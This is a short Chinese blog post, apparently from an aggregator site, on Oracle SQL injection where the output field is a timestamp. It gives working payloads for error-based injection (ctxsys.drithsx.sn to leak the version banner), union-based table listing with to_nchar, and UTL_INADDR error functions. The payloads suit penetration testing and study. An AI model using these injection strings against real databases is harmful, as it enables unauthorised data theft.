当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
猜你喜欢
![[Introduction to MySQL 8 to Mastery] Basics - silent installation of MySQL on Linux system, cross-version upgrade](/img/af/7a2cdcc6535c04c508c9ddf9ee0cb2.png)
随机推荐
1D, 2D, 3D convolution operations in pytorch
目标检测学习笔记
If the account number or password is entered incorrectly for many times, the account will be banned.
Redis first meeting
tf.keras.utils.get_file()
“档次法”——用于物品体积分布不均匀的01背包问题的求解方法
C语言如何分辨大小端
torch.normal function usage
wpf wrapPanel居中并从左到右排列
C语言教程(一)-准备
剑指offer专项突击版 ---第 5 天
mysql 的简单运用命令
剑指offer专项突击版 ---- 第1天
Object Detection Study Notes
With MVC, why DDD?
三子棋讲解(C语言)
wpf ScrowViewer水平滚动
10 【高度塌陷与BFC】
Anaconda configure environment directives
leetcode-438. 找到字符串中所有字母异位词(滑动窗口)